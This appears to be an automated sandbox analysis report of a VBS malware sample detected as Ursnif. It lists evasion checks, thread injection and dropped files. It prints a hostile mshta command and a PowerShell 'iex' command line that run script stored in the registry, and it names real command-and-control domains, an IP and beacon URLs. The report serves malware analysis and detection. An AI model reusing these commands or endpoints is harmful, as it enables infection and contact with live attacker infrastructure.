Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000000.00000003.563925033.000002CC0FD13000.00000004.00000001.sdmp Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000000.00000003.570233419.000002CC13DA9000.00000004.00000001.sdmp Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: FORTITRACER.EXEA
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\wscript.exe TID: 1932 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -8301034833169293s >= -30000s Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.dll Jump to dropped file
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6781 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2433 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior

Anti Debugging:

barindex
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Launches processes in debugging mode, may be used to hinder debugging
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe File created: fum.cpp.0.dr Jump to dropped file
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 185.251.90.253 80 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: unknown protection: execute and read and write Jump to behavior
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\hvjfk3yo\hvjfk3yo.0.cs Jump to dropped file
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3388 Jump to behavior
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: unknown EIP: 736E1580 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP' Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 cpuid 34_2_01206CD6
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_0120682B HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process, 34_2_0120682B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01205A5D GetVersion,lstrcat,lstrcat,lstrcat,GetLastError, 34_2_01205A5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 34_2_01206CD6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 34_2_01206CD6

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: avz.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: cports.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: lordpe.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: icesword.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: ollydbg.exe
Source: wscript.exe, 00000000.00000003.566823488.000002CC13DBE000.00000004.00000001.sdmp Binary or memory string: regshot.exe

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 3128, type: MEMORYSTR
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.566a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.5718d48.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 34.3.rundll32.exe.56e94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 480986 Sample: start[526268].vbs Startdate: 10/09/2021 Architecture: WINDOWS Score: 100 44 art.microsoftsofymicrosoftsoft.at 2->44 46 resolver1.opendns.com 2->46 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Multi AV Scanner detection for domain / URL 2->52 54 Found malware configuration 2->54 56 12 other signatures 2->56 9 mshta.exe 19 2->9         started        12 wscript.exe 2 2->12         started        15 WmiPrvSE.exe 2->15         started        17 2 other processes 2->17 signatures3 process4 file5 66 Suspicious powershell command line found 9->66 19 powershell.exe 2 29 9->19         started        42 C:\Users\user\AppData\Local\Temp\fum.cpp, PE32 12->42 dropped 68 Benign windows process drops PE files 12->68 70 VBScript performs obfuscated calls to suspicious functions 12->70 72 Deletes itself after installation 12->72 74 Creates processes via WMI 12->74 23 rundll32.exe 15->23         started        signatures6 process7 file8 36 C:\Users\user\AppData\Local\...\hvjfk3yo.0.cs, UTF-8 19->36 dropped 38 C:\Users\user\AppData\...\1cv1ijms.cmdline, UTF-8 19->38 dropped 58 Modifies the context of a thread in another process (thread injection) 19->58 60 Maps a DLL or memory area into another process 19->60 62 Compiles code for process injection (via .Net compiler) 19->62 64 Creates a thread in another existing process (thread injection) 19->64 25 csc.exe 3 19->25         started        28 conhost.exe 19->28         started        30 rundll32.exe 23->30         started        signatures9 process10 dnsIp11 40 C:\Users\user\AppData\Local\...\1cv1ijms.dll, PE32 25->40 dropped 34 cvtres.exe 1 25->34         started        48 atl.bigbigpoppa.com 185.251.90.253, 49790, 49791, 49792 SPRINTHOSTRU Russian Federation 30->48 76 System process connects to network (likely due to code injection or exploit) 30->76 78 Writes registry values via WMI 30->78 file12 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.251.90.253
 art.microsoftsofymicrosoftsoft.at Russian Federation
35278 SPRINTHOSTRU true

Contacted Domains

Name IP Active
resolver1.opendns.com 208.67.222.222 true
art.microsoftsofymicrosoftsoft.at 185.251.90.253 true
atl.bigbigpoppa.com 185.251.90.253 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://art.microsoftsofymicrosoftsoft.at/fpsVrgA85_2/BZUV9Iws3c_2Fj/GkkWmnklFKPgFBQ8hMP6W/ISGgirn8yOZisrZs/5_2BH8scRlnvRek/EGKptIwp8lSo93GFx6/ymWkd9jdg/4KpkPYuuZAAAek8BuLEK/tznSDyfWtC0KjQGP2d_/2BrsiHfOmQlV7YgPTes0MP/b6lv_2B55mg9j/CZcF_2Fn/c7jP_2BxBvmhfldW4gAwZkY/uow0BznEMg/Wu3a_2FnHyKBj_2BJ/8ZnXzqvUM8Ze/cMFtkguu1z4/ENTz8901wZ21V2/97iMfuV3Gozq6_2FCxmu3/2vuyb0vOGb_2B1J_/2BS8kN2df/902r true
  • Avira URL Cloud: safe
 unknown
http://atl.bigbigpoppa.com/NhQOwDmOWNWhoZkCuvIJYT/yyrgcNktQOio5/MAWNnOPh/YOpi6p7HZNMrM8dfCZNfhKR/6onGC0_2Fj/Z9tF912mepKiyl36W/W4huWMRggYfW/XcsWaKpGEUD/RLGSHFoZE1byyc/rlBcayy_2BaEyDegqhXic/uK_2B61p_2BSvpFm/KyqmkPSMKG7KXQh/rKyHlYF1pKbQ_2FrYs/GJ_2FCBgc/9AGhinNAfGtoNp19N2M0/VRQmCiVDj4baSUAqCoz/3V8nTzokn2tRxlMEPZAuLu/2tgH0PvXzWJgh/YQdIJgxg/bNHS_2BzqfAV52iuY_2FTg4/1Z1d8SkfRiehoMkV7n/yUZu true
  • Avira URL Cloud: malware
 unknown